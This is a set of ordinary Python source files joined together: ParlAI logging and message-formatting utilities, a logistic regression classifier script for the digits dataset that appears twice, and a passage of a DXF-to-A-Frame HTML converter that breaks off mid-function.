goal. """ def __init__(self): """ Set up timer. """ self.timer = Timer() self.tot_time = 0 def total_time(self): """ Return time elapsed at last log call. """ return self.tot_time def time(self): """ Return current timer time. """ return self.timer.time() def log(self, done, total, report=None): """ Log report, time elapsed, and percentage progress towards goal. :param done: number of examples completed so far :param total: total number of elements to be completed. if total > 0, calculates the time remaining and percentage complete. :param report: dict of pairs to log :returns: tuple log string, log dict log string contains time elapsed and string representation of the log dict log dict contains pairs of all items to log, which includes percentage complete and projected time left if total > 0 """ from parlai.core.metrics import Metric # delay import to prevent circular dep if isinstance(done, Metric): done = done.value() self.tot_time += self.timer.time() self.timer.reset() log = {} log['exs'] = done if total > 0: log['%done'] = done / total if log["%done"] > 0: time_left = self.tot_time / log['%done'] - self.tot_time log['time_left'] = str(int(time_left)) + 's' z = '%.2f' % (100 * log['%done']) log['%done'] = str(z) + '%' if report: log = {**report, **log} int_time = int(self.tot_time) report_s = json.dumps(nice_report(log)) text = f'{int_time}s elapsed: {report_s}' return text, log class AttrDict(dict): """ Helper class to have a dict-like object with dot access. For example, instead of `d = {'key': 'value'}` use `d = AttrDict(key='value')`. To access keys, instead of doing `d['key']` use `d.key`. While this has some limitations on the possible keys (for example, do not set the key `items` or you will lose access to the `items()` method), this can make some code more clear. """ def __init__(self, *args, **kwargs): """ Initialize AttrDict using input dict. """ super().__init__(*args, **kwargs) self.__dict__ = self class NoLock(object): """ Empty `lock`. Does nothing when you enter or exit. """ def __enter__(self): """ No-op. """ return self def __exit__(self, exc_type, exc_value, exc_traceback): """ No-op. """ pass def nice_report(report): from parlai.core.metrics import Metric output = {} for k, v in report.items(): if isinstance(v, Metric): v = v.value() if isinstance(v, float): v = round_sigfigs(v, 4) output[k] = v return output def round_sigfigs(x: Union[float, 'torch.Tensor'], sigfigs=4) -> float: """ Round value to specified significant figures. :param x: input number :param sigfigs: number of significant figures to return :returns: float number rounded to specified sigfigs """ x_: float if __TORCH_AVAILABLE and isinstance(x, torch.Tensor): x_ = x.item() else: x_ = x # type: ignore try: if x_ == 0: return 0 return round(x_, -math.floor(math.log10(abs(x_)) - sigfigs + 1)) except (ValueError, OverflowError) as ex: if x_ in [float('inf'), float('-inf')] or x_ != x_: # inf or nan return x_ else: raise ex single_nolock = NoLock() def no_lock(): """ Build a nolock for other classes to use for no-op locking. """ return single_nolock class PaddingUtils(object): """ Helps with padding input and target tensors. DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ # DEPRECATIONDAY: delete! @classmethod def pad_text( cls, observations, dictionary, end_idx=None, null_idx=0, dq=False, eval_labels=True, truncate=None, ): """ Pad observations to max width. We check that examples are valid, pad with zeros, and sort by length so that we can use the pack_padded function. The list valid_inds keeps track of which indices are valid and the order in which we sort the examples. dq -- whether we should use deque or list eval_labels -- whether or not we want to consider eval labels truncate -- truncate input and output lengths DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ def valid(obs): # check if this is an example our model should actually process return 'text' in obs and len(obs['text']) > 0 try: # valid examples and their indices valid_inds, exs = zip( *[(i, ex) for i, ex in enumerate(observations) if valid(ex)] ) except ValueError: # zero examples to process in this batch, so zip failed to unpack return None, None, None, None, None, None # `x` text is already tokenized and truncated # sort by length so we can use pack_padded if any(['text2vec' in ex for ex in exs]): parsed_x = [ex['text2vec'] for ex in exs] else: parsed_x = [dictionary.txt2vec(ex['text']) for ex in exs] if len(parsed_x) > 0 and not isinstance(parsed_x[0], deque): if dq: parsed_x = [deque(x, maxlen=truncate) for x in parsed_x] elif truncate is not None and truncate > 0: parsed_x = [x[-truncate:] for x in parsed_x] x_lens = [len(x) for x in parsed_x] ind_sorted = sorted(range(len(x_lens)), key=lambda k: -x_lens[k]) exs = [exs[k] for k in ind_sorted] valid_inds = [valid_inds[k] for k in ind_sorted] parsed_x = [parsed_x[k] for k in ind_sorted] end_idxs = [x_lens[k] for k in ind_sorted] eval_labels_avail = any(['eval_labels' in ex for ex in exs]) labels_avail = any(['labels' in ex for ex in exs]) if eval_labels: some_labels_avail = eval_labels_avail or labels_avail else: some_labels_avail = labels_avail max_x_len = max(x_lens) # pad with zeros if dq: parsed_x = [ x if len(x) == max_x_len else x + deque((null_idx,)) * (max_x_len - len(x)) for x in parsed_x ] else: parsed_x = [ x if len(x) == max_x_len else x + [null_idx] * (max_x_len - len(x)) for x in parsed_x ] xs = parsed_x # set up the target tensors ys = None labels = None y_lens = None if some_labels_avail: # randomly select one of the labels to update on (if multiple) if labels_avail: labels = [random.choice(ex.get('labels', [''])) for ex in exs] else: labels = [random.choice(ex.get('eval_labels', [''])) for ex in exs] # parse each label and append END if dq: parsed_y = [deque(maxlen=truncate) for _ in labels] for deq, y in zip(parsed_y, labels): deq.extendleft(reversed(dictionary.txt2vec(y))) else: parsed_y = [dictionary.txt2vec(label) for label in labels] if end_idx is not None: for y in parsed_y: y.append(end_idx) y_lens = [len(y) for y in parsed_y] max_y_len = max(y_lens) if dq: parsed_y = [ y if len(y) == max_y_len else y + deque((null_idx,)) * (max_y_len - len(y)) for y in parsed_y ] else: parsed_y = [ y if len(y) == max_y_len else y + [null_idx] * (max_y_len - len(y)) for y in parsed_y ] ys = parsed_y return xs, ys, labels, valid_inds, end_idxs, y_lens @classmethod def map_predictions( cls, predictions, valid_inds, batch_reply, observations, dictionary, end_idx, report_freq=0.1, labels=None, answers=None, ys=None, ): """ Match predictions to original index in the batch. Predictions are mapped back to appropriate indices in the batch_reply using valid_inds. report_freq -- how often we report predictions DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ for i in range(len(predictions)): # map the predictions back to non-empty examples in the batch # we join with spaces since we produce tokens one at a timelab curr = batch_reply[valid_inds[i]] output_tokens = [] j = 0 for c in predictions[i]: if c == end_idx and j != 0: break else: output_tokens.append(c) j += 1 curr_pred = dictionary.vec2txt(output_tokens) curr['text'] = curr_pred if labels is not None and answers is not None and ys is not None: y = [] for c in ys[i]: if c == end_idx: break else: y.append(c) answers[valid_inds[i]] = y elif answers is not None: answers[valid_inds[i]] = curr_pred if random.random() > (1 - report_freq): # log sometimes print('TEXT: ', observations[valid_inds[i]]['text']) print('PREDICTION: ', curr_pred, '\n~') return def clip_text(text, max_len): """ Clip text to max length, adding ellipses. """ if len(text) > max_len: begin_text = ' '.join(text[: math.floor(0.8 * max_len)].split(' ')[:-1]) end_text = ' '.join( text[(len(text) - math.floor(0.2 * max_len)) :].split(' ')[1:] ) if len(end_text) > 0: text = begin_text + ' ...\n' + end_text else: text = begin_text + ' ...' return text def _ellipse(lst: List[str], max_display: int = 5, sep: str = '|') -> str: """ Like join, but possibly inserts an ellipsis. :param lst: The list to join on :param int max_display: the number of items to display for ellipsing. If -1, shows all items :param string sep: the delimiter to join on """ # copy the list (or force it to a list if it's a set) choices = list(lst) # insert the ellipsis if necessary if max_display > 0 and len(choices) > max_display: ellipsis = '...and {} more'.format(len(choices) - max_display) choices = choices[:max_display] + [ellipsis] return sep.join(str(c) for c in choices) def display_messages( msgs: List[Dict[str, Any]], prettify: bool = False, ignore_fields: str = '', max_len: int = 1000, ) -> Optional[str]: """ Return a string describing the set of messages provided. If prettify is true, candidates are displayed using prettytable. ignore_fields provides a list of fields in the msgs which should not be displayed. """ def _token_losses_line( msg: Dict[str, Any], ignore_fields: List[str], space: str ) -> Optional[str]: """ Displays the loss associated with each token. Can be used for debugging generative models. See TorchGeneratorAgent._construct_token_losses for an example implementation. """ key = 'token_losses' token_losses = msg.get(key, None) if key in ignore_fields or not token_losses: return None # Reduce losses to 4 significant figures formatted_tl = ' | '.join( [f"{tl[0]} {float('{:.4g}'.format(tl[1]))}" for tl in token_losses] ) return f'{space}[{key}]: {formatted_tl}' lines = [] episode_done = False ignore_fields_ = ignore_fields.split(',') for index, msg in enumerate(msgs): if msg is None or (index == 1 and 'agent_reply' in ignore_fields_): # We only display the first agent (typically the teacher) if we # are ignoring the agent reply. continue if msg.get('episode_done'): episode_done = True # Possibly indent the text (for the second speaker, if two). space = '' if len(msgs) == 2 and index == 1: space = ' ' # Only display rewards !=0 as they are confusing in non-RL tasks. if msg.get('reward', 0) != 0: lines.append(space + '[reward: {r}]'.format(r=msg['reward'])) for key in msg: if key not in DISPLAY_MESSAGE_DEFAULT_FIELDS and key not in ignore_fields_: if type(msg[key]) is list: line = '[' + key + ']:\n ' + _ellipse(msg[key], sep='\n ') else: line = '[' + key + ']: ' + clip_text(str(msg.get(key)), max_len) lines.append(space + line) if type(msg.get('image')) in [str, torch.Tensor]: lines.append(f'[ image ]: {msg["image"]}') if msg.get('text', ''): text = clip_text(msg['text'], max_len) ID = '[' + msg['id'] + ']: ' if 'id' in msg else '' lines.append(space + ID + text) for field in {'labels', 'eval_labels', 'label_candidates', 'text_candidates'}: if msg.get(field) and field not in ignore_fields_: lines.append('{}[{}: {}]'.format(space, field, _ellipse(msg[field]))) # Handling this separately since we need to clean up the raw output before displaying. token_loss_line = _token_losses_line(msg, ignore_fields_, space) if token_loss_line: lines.append(token_loss_line) if episode_done: lines.append('- - - - - - - - - - - - - - - - - - - - -') return '\n'.join(lines) def str_to_msg(txt, ignore_fields=''): """ Convert formatted string to ParlAI message dict. :param txt: formatted string to convert. String format is tab-separated fields, with colon separating field name and contents. :param ignore_fields: (default '') comma-separated field names to not include in the msg dict even if they're in the string. """ def tostr(txt): txt = str(txt) txt = txt.replace('\\t', '\t') txt = txt.replace('\\n', '\n') txt = txt.replace('__PIPE__', '|') return txt def tolist(txt): vals = txt.split('|') for v in vals: v = tostr(v) return vals def convert(key, value): if key == 'text' or key == 'id': return tostr(value) elif ( key == 'label_candidates' or key == 'labels' or key == 'eval_labels' or key == 'text_candidates' ): return tolist(value) elif key == 'episode_done': return bool(value) else: return tostr(value) if txt == '' or txt is None: return None msg = {} for t in txt.split('\t'): ind = t.find(':') key = t[:ind] value = t[ind + 1 :] if key not in ignore_fields.split(','): msg[key] = convert(key, value) msg['episode_done'] = msg.get('episode_done', False) return Message(msg) def msg_to_str(msg, ignore_fields=''): """ Convert ParlAI message dict to string. :param msg: dict to convert into a string. :param ignore_fields: (default '') comma-separated field names to not include in the string even if they're in the msg dict. """ def filter(txt): txt = str(txt) txt = txt.replace('\t', '\\t') txt = txt.replace('\n', '\\n') txt = txt.replace('|', '__PIPE__') return txt def add_field(name, data): if name == 'reward' and data == 0: return '' if name == 'episode_done' and data is False: return '' txt = '' if type(data) == tuple or type(data) == set or type(data) == list: # list entries for c in data: txt += filter(c) + "|" txt = txt[:-1] else: # single fields txt = filter(data) return name + ":" + txt + '\t' default_fields = [ 'id', 'text', 'labels', 'label_candidates', 'episode_done', 'reward', ] txt = "" ignore_fields = ignore_fields.split(',') for f in default_fields: if f in msg and f not in ignore_fields: txt += add_field(f, msg[f]) for f in msg.keys(): if f not in default_fields and f not in ignore_fields: txt += add_field(f, msg[f]) return txt.rstrip('\t') # DEPRECATION DAY: DELETE def set_namedtuple_defaults(namedtuple, default=None): """ Set *all* of the fields for a given nametuple to a singular value. Additionally removes the default docstring for each field. Modifies the tuple in place, but returns it anyway. More info: https://stackoverflow.com/a/18348004 :param namedtuple: A constructed collections.namedtuple :param default: The default value to set. :returns: the modified namedtuple """ namedtuple.__new__.__defaults__ = (default,) * len(namedtuple._fields) for f in namedtuple._fields: del getattr(namedtuple, f).__doc__ return namedtuple _seen_warnings: Set[str] = set() def warn_once(msg: str, warningtype=None) -> None: """ Raise a warning, but only once. :param str msg: Message to display :param Warning warningtype: Type of warning, e.g. DeprecationWarning """ global _seen_warnings if msg not in _seen_warnings: _seen_warnings.add(msg) warnings.warn(msg, warningtype, stacklevel=2)
#!/usr/bin/python # Import necessary libraries/modules import os import sys sys.path.append(os.path.join("..", "..")) import argparse import numpy as np from sklearn import metrics from sklearn import datasets from sklearn.model_selection import train_test_split from sklearn.linear_model import LogisticRegression from sklearn.metrics import accuracy_score class LogRegMNIST(): """This is a class for performing a Logistic Regression classification on the MNIST dataset. """ def __init__(self, digits, args): self.args = args self.X = digits.data.astype("float") #extracting data self.y = digits.target #extracting labels def split(self): """ Function for splitting MNIST dataset into train and test sets. """ # Normalize (MinMax regularization) self.X = (self.X - self.X.min())/(self.X.max() - self.X.min()) # Split into train and test set self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, random_state=self.args['random_state'], train_size=1-self.args['test_size'], test_size=self.args['test_size']) def train_model(self): """Function for training the Logistic Regression classifier. """ # Initialise model and fit that model to the training data and labels clf = LogisticRegression(penalty='none', tol=0.1, solver='saga', multi_class='multinomial').fit(self.X_train, self.y_train) return clf def calc_eval_metrics(self, clf): """Function for calculating evaluation metrics. Input: clf: trained Logistic Regression classifier """ # Take the trained model and use to predict test class self.y_pred = clf.predict(self.X_test) # Calculate evaluation metrics cm = metrics.classification_report(self.y_test, self.y_pred) return cm def save_eval_metrics(self, cm): """Function for saving file with evaluation metrics. Input: cm: evaluation metrics """ # Specifying output path outpath = os.path.join("out", f"{self.args["filename"]}.txt") # Writing file with open(outpath, "w", encoding="utf-8") as file: file.write(cm) def run_classifier(self): """Function for running all functions within the class in the correct order. """ # Splitting data self.split() # Train model clf = self.train_model() # Calculate evaluation metrics cm = self.calc_eval_metrics(clf) # Print evaluation metrics print(f"\n EVALUATION METRICS: \n {cm}") # Save evaluation metrics self.save_eval_metrics(cm) # Creating a function that checks whether a given value is between 0 and 1 and return an error if it is not. This is used to ensure that only a test_size-argument within the correct range can be parsed in the command-line. def percentFloat(string): value = float(string) if value < 0 or value > 1: raise argparse.ArgumentTypeError('Value has to be between 0 and 1') return value def main(): ap = argparse.ArgumentParser(description="[INFO] This script uses the full MNIST data set, trains a Logistic Regression Classifier, and prints and saves the evaluation metrics to the terminal.") # Argument for specifying a random-state value ap.add_argument("-rs", "--random_state", required=False, type=int, default=9, help="int, value for random state of model") # Argument for specifying size of test set ap.add_argument("-ts", "--test_size", required=False, type=percentFloat, #here I use the function I created above default=0.2, help="float, proportional size of test set (must be number between 0 and 1)") # Argument for specifying filename of evaluation metrics ap.add_argument("-fn", "--filename", required=False, type=str, default="evaluation_metrics_LR", help="str, filename for saving the evaluation metrics") args = vars(ap.parse_args()) # Loading data digits = datasets.load_digits() # Turning into LogRegMNIST object (the class I created above) logreg = LogRegMNIST(digits, args) # Perform classification logreg.run_classifier() # Define behaviour when called from command line if __name__=="__main__": main() print("[INFO] The evaluation metrics has been saved in 'out/'.")
#!/usr/bin/python # Import necessary libraries/modules import os import sys sys.path.append(os.path.join("..", "..")) import argparse import numpy as np from sklearn import metrics from sklearn import datasets from sklearn.model_selection import train_test_split from sklearn.linear_model import LogisticRegression from sklearn.metrics import accuracy_score class LogRegMNIST(): """This is a class for performing a Logistic Regression classification on the MNIST dataset. """ def __init__(self, digits, args): self.args = args self.X = digits.data.astype("float") #extracting data self.y = digits.target #extracting labels def split(self): """ Function for splitting MNIST dataset into train and test sets. """ # Normalize (MinMax regularization) self.X = (self.X - self.X.min())/(self.X.max() - self.X.min()) # Split into train and test set self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, random_state=self.args['random_state'], train_size=1-self.args['test_size'], test_size=self.args['test_size']) def train_model(self): """Function for training the Logistic Regression classifier. """ # Initialise model and fit that model to the training data and labels clf = LogisticRegression(penalty='none', tol=0.1, solver='saga', multi_class='multinomial').fit(self.X_train, self.y_train) return clf def calc_eval_metrics(self, clf): """Function for calculating evaluation metrics. Input: clf: trained Logistic Regression classifier """ # Take the trained model and use to predict test class self.y_pred = clf.predict(self.X_test) # Calculate evaluation metrics cm = metrics.classification_report(self.y_test, self.y_pred) return cm def save_eval_metrics(self, cm): """Function for saving file with evaluation metrics. Input: cm: evaluation metrics """ # Specifying output path outpath = os.path.join("out", f"{self.args['filename']}.txt") # Writing file with open(outpath, "w", encoding="utf-8") as file: file.write(cm) def run_classifier(self): """Function for running all functions within the class in the correct order. """ # Splitting data self.split() # Train model clf = self.train_model() # Calculate evaluation metrics cm = self.calc_eval_metrics(clf) # Print evaluation metrics print(f"\n EVALUATION METRICS: \n {cm}") # Save evaluation metrics self.save_eval_metrics(cm) # Creating a function that checks whether a given value is between 0 and 1 and return an error if it is not. This is used to ensure that only a test_size-argument within the correct range can be parsed in the command-line. def percentFloat(string): value = float(string) if value < 0 or value > 1: raise argparse.ArgumentTypeError('Value has to be between 0 and 1') return value def main(): ap = argparse.ArgumentParser(description="[INFO] This script uses the full MNIST data set, trains a Logistic Regression Classifier, and prints and saves the evaluation metrics to the terminal.") # Argument for specifying a random-state value ap.add_argument("-rs", "--random_state", required=False, type=int, default=9, help="int, value for random state of model") # Argument for specifying size of test set ap.add_argument("-ts", "--test_size", required=False, type=percentFloat, #here I use the function I created above default=0.2, help="float, proportional size of test set (must be number between 0 and 1)") # Argument for specifying filename of evaluation metrics ap.add_argument("-fn", "--filename", required=False, type=str, default="evaluation_metrics_LR", help="str, filename for saving the evaluation metrics") args = vars(ap.parse_args()) # Loading data digits = datasets.load_digits() # Turning into LogRegMNIST object (the class I created above) logreg = LogRegMNIST(digits, args) # Perform classification logreg.run_classifier() # Define behaviour when called from command line if __name__=="__main__": main() print("[INFO] The evaluation metrics has been saved in 'out/'.")
from math import radians, sin, cos, asin, degrees, pi, sqrt, pow, fabs, atan2 def parse_dxf(dxf_f, material_gallery): output = {} layer_color = {} flag = False x = 0 value = 'dummy' while value !='ENTITIES': key = dxf_f.readline().strip() value = dxf_f.readline().strip() if value == 'AcDbLayerTableRecord':#dict of layer names and colors key = dxf_f.readline().strip() layer_name = dxf_f.readline().strip() key = dxf_f.readline().strip() value = dxf_f.readline().strip() key = dxf_f.readline().strip() layer_color[layer_name] = cad2hex(dxf_f.readline().strip()) elif value=='EOF' or key=='':#security to avoid loops if file is corrupted return output while value !='ENDSEC': key = dxf_f.readline().strip() value = dxf_f.readline().strip() if value=='EOF' or key=='':#security to avoid loops if file is corrupted return output if flag == 'face':#stores values for 3D faces if key == '8':#layer name data[key] = value elif key == '10' or key == '11' or key == '12' or key == '13':#X position data[key] = float(value) elif key == '20' or key == '21' or key == '22' or key == '23':#mirror Y position data[key] = -float(value) elif key == '30' or key == '31' or key == '32' or key == '33':#Z position data[key] = float(value) elif flag == 'block':#stores values for blocks if key == '2':#block name data[key] = value if key == '8':#layer name data[key] = value data['layer'] = value#sometimes key 8 is replaced, so I need the original layer value elif key == '10' or key == '30':#X Z position data[key] = float(value) elif key == '20':#Y position, mirrored data[key] = -float(value) elif key == '50':#Z rotation data[key] = float(value) elif key == '41' or key == '42' or key == '43':#scale values data[key] = float(value) elif key == '210':#X of OCS unitary vector Az_1 = float(value) P_x = data['10'] elif key == '220':#Y of OCS unitary vector Az_2 = float(value) P_y = -data['20']#reset original value elif key == '230':#Z of OCS unitary vector Az_3 = float(value) P_z = data['30'] #arbitrary axis algorithm #see if OCS z vector is close to world Z axis if fabs(Az_1) < (1/64) and fabs(Az_2) < (1/64): W = ('Y', 0, 1, 0) else: W = ('Z', 0, 0, 1) #cross product for OCS x arbitrary vector, normalized Ax_1 = W[2]*Az_3-W[3]*Az_2 Ax_2 = W[3]*Az_1-W[1]*Az_3 Ax_3 = W[1]*Az_2-W[2]*Az_1 Norm = sqrt(pow(Ax_1, 2)+pow(Ax_2, 2)+pow(Ax_3, 2)) Ax_1 = Ax_1/Norm Ax_2 = Ax_2/Norm Ax_3 = Ax_3/Norm #cross product for OCS y arbitrary vector, normalized Ay_1 = Az_2*Ax_3-Az_3*Ax_2 Ay_2 = Az_3*Ax_1-Az_1*Ax_3 Ay_3 = Az_1*Ax_2-Az_2*Ax_1 Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2)) Ay_1 = Ay_1/Norm Ay_2 = Ay_2/Norm Ay_3 = Ay_3/Norm #insertion world coordinates from OCS data['10'] = P_x*Ax_1+P_y*Ay_1+P_z*Az_1 data['20'] = P_x*Ax_2+P_y*Ay_2+P_z*Az_2 data['30'] = P_x*Ax_3+P_y*Ay_3+P_z*Az_3 #OCS X vector translated into WCS Ax_1 = ((P_x+cos(radians(data['50'])))*Ax_1+(P_y+sin(radians(data['50'])))*Ay_1+P_z*Az_1)-data['10'] Ax_2 = ((P_x+cos(radians(data['50'])))*Ax_2+(P_y+sin(radians(data['50'])))*Ay_2+P_z*Az_2)-data['20'] Ax_3 = ((P_x+cos(radians(data['50'])))*Ax_3+(P_y+sin(radians(data['50'])))*Ay_3+P_z*Az_3)-data['30'] #cross product for OCS y vector, normalized Ay_1 = Az_2*Ax_3-Az_3*Ax_2 Ay_2 = Az_3*Ax_1-Az_1*Ax_3 Ay_3 = Az_1*Ax_2-Az_2*Ax_1 Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2)) Ay_1 = Ay_1/Norm Ay_2 = Ay_2/Norm Ay_3 = Ay_3/Norm #A-Frame rotation order is Yaw(Z), Pitch(X) and Roll(Y) #thanks for help Marilena Vendittelli and https://www.geometrictools.com/ if Ay_3<1: if Ay_3>-1: pitch = asin(Ay_3) yaw = atan2(-Ay_1, Ay_2) roll = atan2(-Ax_3, Az_3) else: pitch = -pi/2 yaw = -atan2(Az_1, Ax_1) roll = 0 else: pitch = pi/2 yaw = atan2(Az_1, Ax_1) roll = 0 #Y position, mirrored data['20'] = -data['20'] #rotations from radians to degrees data['210'] = degrees(pitch) data['50'] = degrees(yaw) data['220'] = -degrees(roll) elif flag == 'attrib':#stores values for attributes within block if key == '1':#attribute value attr_value = value elif key == '2':#attribute key data[value] = attr_value flag = 'block'#restore block modality if key == '0': invisible = False#by default layer is visible if flag == 'face':#close 3D face data['2'] = '3dface' #is material set in model? try: material = material_gallery.get(layer = data['8']) data['color'] = material.color invisible = material.invisible#layer visibility except: data['color'] = layer_color[data['8']] data['8'] = 'default' if invisible: flag = False else: data['num'] = x output[x] = data if data['12']!=data['13'] or data['22']!=data['23'] or data['32']!=data['33']: data2 = data.copy() data2['11'] = data['12'] data2['21'] = data['22'] data2['31'] = data['32'] data2['12'] = data['13'] data2['22'] = data['23'] data2['32'] = data['33'] x += 1 data2['num'] = x output[x] = data2 flag = False elif value == 'ATTRIB':#start attribute within block attr_value = '' flag = 'attrib' elif flag == 'block':#close block #material images are patterns? is material set in model? try: material = material_gallery.get(layer = data['8']) data['color'] = material.color invisible = material.invisible#layer visibility if material.pattern:# == True data['repeat']=True except: data['color'] = layer_color[data['8']] data['8'] = 'default' if invisible: flag = False else: data['num'] = x output[x] = data flag = False if value == '3DFACE':#start 3D face data = {}#default values flag = 'face' x += 1 elif value == 'INSERT':#start block data = {'41': 1, '42': 1, '43': 1, '50': 0, '210': 0, '220': 0, '230': 1,'repeat': False, 'type': '','animation': False}#default values flag = 'block' x += 1 return output def make_html(page_obj, collection, partitions, finishings, csv_f): output = {} for x, data in collection.items(): if data['2'] == '3dface': output[x] = make_triangle(page_obj, x, data) if data['2'] == '6planes':#left for legacy output[x] = make_box(page_obj, x, data) elif data['2'] == 'box' or data['2'] == 'a-box': output[x] = make_box(page_obj, x, data) elif data['2'] == 'cylinder' or data['2'] == 'a-cylinder': output[x] = make_cylinder(page_obj, x, data) elif data['2'] == 'a-curvedimage': output[x] = make_curvedimage(x, data) elif data['2'] == 'cone' or data['2'] == 'a-cone': output[x] = make_cone(page_obj, x, data) elif data['2'] == 'sphere' or data['2'] == 'a-sphere': output[x] = make_sphere(page_obj, x, data) elif data['2'] == 'circle' or data['2'] == 'a-circle': output[x] = make_circle(page_obj, x, data) elif data['2'] == 'plane' or data['2'] == 'a-plane' or data['2'] == 'look-at': output[x] = make_plane(page_obj, x, data) elif data['2'] == 'floor':#left for legacy data['210'] = data['210'] - 90 output[x] = make_plane(page_obj, x, data) elif data['2'] == 'ceiling':#left for legacy data['210'] = data['210'] + 90 output[x] = make_plane(page_obj, x, data) elif data['2'] == 'light' or data['2'] == 'a-light': output[x] = make_light(page_obj, x, data) elif data['2'] == 'a-text': output[x] = make_text(x, data) elif data['2'] == 'a-link': output[x] = make_link(page_obj, x, data) elif data['2'] == 'a-door': door = AOpening(page_obj, data, partitions, finishings, csv_f) if door.type_obj: door.has_type()#changes colors and writes to csv else: door.no_type()#writes to csv if door.finish_obj: door.has_finishing()#changes colors again if door.d['alert'] == 'None': output[x] = door.write_html() else:#by now useless, if is always true pass #output[x] = door.write_html_alert() elif data['2'] == 'a-furniture': furn = AFurniture(page_obj, data, finishings) if furn.finish_obj: furn.has_finishing()#changes colors output[x] = furn.write_html() elif data['2'] == 'a-wall' or data['2'] == 'a-slab' or data['2'] == 'a-openwall': part = APartition(page_obj, data, partitions, finishings, csv_f) if part.type_obj: part.calc_weight() else: part.no_weight() #here we could add the has_finishing, as in AOpening if part.d['alert'] == 'None': output[x] = part.write_html() else: output[x] = part.write_html_alert() return output def reference_openings(collection): collection2 = collection.copy() for x, data in collection.items(): if data['2'] == 'a-door': collection[x] = data for x2, data2 in collection2.items(): if data2['2'] == 'a-wall': if data['210']==0 and data['220']==0 and data2['210']==0 and data2['220']==0: data2 = door_straight_case(x, data, data2) else: data2 = door_tilted_case(x, data, data2) collection[x2] = data2 return collection def reference_animations(collection):#TODO collection2 = collection.copy() for x, data in collection.items(): if data['2'] == 'a-animation': collection[x] = data for x2, data2 in collection2.items(): if data2['2'] != '3dface' or data2['2'] != 'a-wall' or data2['2'] != 'a-openwall' or data2['2'] != 'a-door': if data['10']==data2['10'] and data['20']==data2['20'] and data['30']==data2['30']: data2['animation'] = True data2['ATTRIBUTE'] = data['ATTRIBUTE'] data2['FROM'] = data['FROM'] data2['TO'] = data['TO'] data2['BEGIN'] = data['BEGIN'] data2['DIRECTION'] = data['DIRECTION'] data2['REPEAT'] = data['REPEAT'] data2['DURATION'] = data['DURATION'] collection[x2] = data2 return collection def door_straight_case(x, data, data2): if data['30']==data2['30'] and data['43']>0 and data2['43']>0: rotd = round(data['50'], 0) rotw = round(data2['50'], 0) if rotd==rotw-180 or rotd-180==rotw: backwards = -1 else: backwards = 1 if rotd == rotw or backwards == -1: #translation xt = data['10']-data2['10'] zt = data['20']-data2['20'] #rotation alfa = radians(data2['50']) xd = round(xt*cos(alfa)-zt*sin(alfa), 4) zd = round(xt*sin(alfa)+zt*cos(alfa), 4) xde = xd + round(data['41'], 4)*backwards zde = zd + round(data['42'], 4) #wall bounding box if data2['41'] > 0: xmaxw = round(data2['41'], 4) xminw = 0 else: xmaxw = 0 xminw = round(data2['41'], 4) if data2['42'] > 0: zmaxw = 0 zminw = -round(data2['42'], 4) else: zmaxw = -round(data2['42'], 4) zminw = 0 #door bounding box if xde > xd: xmaxd = xde xmind = xd else: xmaxd = xd xmind = xde if zde > zd: zmaxd = zde * ( - backwards) zmind = zd * ( - backwards) else: zmaxd = zd * ( - backwards) zmind = zde * ( - backwards) #door inclusion if xmaxw >= xmaxd and xminw <= xmind and zmaxw >= zmaxd and zminw <= zmind: data2['door'] = x data2['2'] = 'a-openwall' if data['43']>data2['43']: data2['door_height'] = data2['43'] else: data2['door_height'] = data['43'] if data2['41']>0: data2['door_off_1'] = xmind data2['door_off_2'] = xmaxd else: data2['door_off_1'] = xmaxd - xmaxw data2['door_off_2'] = xmind - xmaxw return data2 #TODO def door_tilted_case(x, data, data2): #d210 = round(data['210']*fabs(data['41'])/data['41'], 4) #d220 = round(data['220']*fabs(data['42'])/data['42'], 4) #d50 = round(data['50']*fabs(data['43'])/data['43'], 4) #w210 = round(data2['210']*fabs(data2['41'])/data2['41'], 4) #w220 = round(data2['220']*fabs(data2['42'])/data2['42'], 4) #w50 = round(data2['50']*fabs(data2['43'])/data2['43'], 4) return data2 #returns repeat image values def is_repeat(repeat, rx, ry): if repeat: output = f'; repeat:{fabs(rx)} {fabs(ry)}' return output else: return ';' #returns positive/negative scaling def unit(nounit): unit = fabs(nounit)/nounit return unit def make_box(page_obj, x, data): outstr = f'<a-entity id="box-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-box id="box-{x}" \n' outstr += f'position="{data['41']/2} {data['43']/2} {-data['42']/2}" \n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' outstr += 'geometry="' try: if data['segments-depth']!='1': outstr += f'segments-depth: {data['segments-depth']};' if data['segments-height']!='1': outstr += f'segments-height: {data['segments-height']};' if data['segments-width']!='1': outstr += f'segments-width: {data['segments-width']};' outstr += '" \n' except KeyError: outstr += '" \n' outstr += f'material="src: #image-{data['8']}; color: {data['color']}' outstr += is_repeat(data["repeat"], data["41"], data["43"]) outstr += '">\n' if data['animation']: outstr += is_animation(data) outstr += '</a-box>\n</a-entity>\n' return outstr def is_animation(data): outstr = f'<a-animation attribute="{data['ATTRIBUTE']}"\n' outstr += f'from="{data['FROM']}"\n' outstr += f'to="{data['TO']}"\n' outstr += f'begin="{data['BEGIN']}"\n' outstr += f'direction="{data['DIRECTION']}"\n' outstr += f'repeat="{data['REPEAT']}"\n' outstr += f'duration="{data['DURATION']}"\n' outstr += '></a-animation>\n' return outstr def make_cone(page_obj, x, data): outstr = f'<a-entity id="cone-{x}-ent" \n' if page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{data['10']} {data['30']} {data['20']}" \n' outstr += f'rotation="{data['210']} {data['50']} {data['220']}">\n' outstr += f'<a-cone id="cone-{x}" \n' outstr += f'position="0 {data['43']/2} 0" \n' if float(data['43']) < 0: outstr += 'rotation="180 0 0">\n' outstr += f'scale="{fabs(data['41'])} {fabs(data['43'])} {fabs(data['42'])}" \n' outstr += 'geometry="' try: if data['open-ended']!='false': outstr += 